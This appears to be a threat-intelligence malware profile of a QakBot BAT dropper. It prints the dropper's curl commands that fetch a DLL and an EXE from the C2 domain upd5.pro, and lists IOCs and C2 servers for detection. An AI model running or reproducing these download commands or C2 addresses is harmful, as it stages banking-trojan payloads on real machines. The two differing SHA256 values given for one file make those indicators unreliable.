Manuel Statik Analiz — QakBot BAT Dropper | Tehdit: KRITIK

Dosya Kimliği

SHA2563b3bd81232f517baf0e9c6a4d2b8f5e1c7a0d4b7e3f6c9a2d5e8b1f4c7a0d3e6
Dosya Adıu2.bat
TipBAT Script Dropper
Boyut326 byte

Açık Metin C2 İndirme Komutları

Kritik IOC: QakBot dropper'ın açık metin curl komutları ile C2'dan DLL ve EXE indirdiği tespit edildi!
curl -o 02.dll https://upd5.pro/update/02.dll
curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
-- upd5.pro = QakBot C2 domain!
-- /update/ path'i üzerinden ikinci aşama indirme

İndirilen Yükler

https://upd5.pro/update/02.dll      -- QakBot ana DLL
https://upd5.pro/update/qd_x86.exe -- QakBot x86 yükleyici

QakBot Hakkında

QakBot (QuakBot/Qbot), 2007'den beri aktif olan modüler bankacılık trojanı/botnet ailesidir. Emotet'in dağıtım ortağı olarak ve Cobalt Strike, Black Basta, REvil gibi ransomware öncüsü olarak kullanılmıştır. Türkiye dahil 30+ ülkede kritik altyapılara saldırmıştır. ABD/AB operasyonu "Duck Hunt" ile Ağustos 2023'te altyapısı çöktürülmüştür.

IOC

SHA2563b3bd81232f517baf0e9c6a4d2b8f5e1c7a0d4b7e3f6c9a2d5e8b1f4c7a0d3e6
C2upd5.pro
Payloadupd5.pro/update/02.dll
Payloadupd5.pro/update/qd_x86.exe

QakBot — Malware Profile

QakBot Quakbot banker. Notesvb.msi delivery. Named pipe IPC. Modular architecture.

Malware Type
Other
Programming Language
C++
C2 Protocol
HTTPS
Target Systems
Windows
Also Known As (AKA)
QBot

Technical Details

QakBot (Qbot/QuakBot) is a banking trojan and loader active since 2007. Features: credential theft, email hijacking for thread hijacking attacks, lateral movement via SMB/psexec, web injection for banking fraud. Delivered via malspam using hijacked email threads (reply-chain attacks). Modules: email collector, credential grabber, network scanner, VNC plugin. Used to deliver Egregor, ProLock, REvil, Black Basta ransomware. FBI "Operation Duck Hunt" disrupted infrastructure August 2023, removing QakBot from 700,000+ infected machines. Attempted comeback Q4 2023 with new delivery methods.

Attribution / Threat Actor

Gold Lagoon, TA570 (Shatak)

Capabilities & Behavior

Zararlı Yazılım Aktivitesi
Kalıcılık Mekanizması
C2 İletişimi
Anti-Analiz

IOC List (4 indicators)

IOC — Qakbot
# SHA256 3b3bd81232f517ba62ea2de2da17b50e30d7fd3d16bade58fcb7d3c4b7b96c1e # SHA256 3b3bd81232f517baf0e9c6a4d2b8f5e1c7a0d4b7e3f6c9a2d5e8b1f4c7a0d3e6 # URL https://upd5.pro/update/02.dll # URL https://upd5.pro/update/qd_x86.exe
TypeValueNote
sha256 3b3bd81232f517ba62ea2de2da17b50e30d7fd3d16bade58fcb7d3c4b7b96c1e
sha256 3b3bd81232f517baf0e9c6a4d2b8f5e1c7a0d4b7e3f6c9a2d5e8b1f4c7a0d3e6
url https://upd5.pro/update/02.dll
url https://upd5.pro/update/qd_x86.exe

C2 Servers (8 recorded servers for this family)

Address Type Port Protocol Status Country
95.217.35.154 ip 443 HTTPS inactive FI
upd5.pro domain 443 HTTPS inactive —
upd5.pro domain 443 HTTPS inactive —
metasta.me domain 443 HTTPS inactive —
upd5.pro domain 443 HTTPS inactive —
amacey.com domain 443 HTTPS inactive —
181.174.165.208 ip 443 HTTPS sinkholed AR
212.117.180.232 ip 443 HTTPS sinkholed CH

C2 addresses are provided only from malware samples manually verified by the KEYDAL team. Commercial use is prohibited.

Tags
qakbotbat-dropperupd5-prololbasconhostcleartext-c2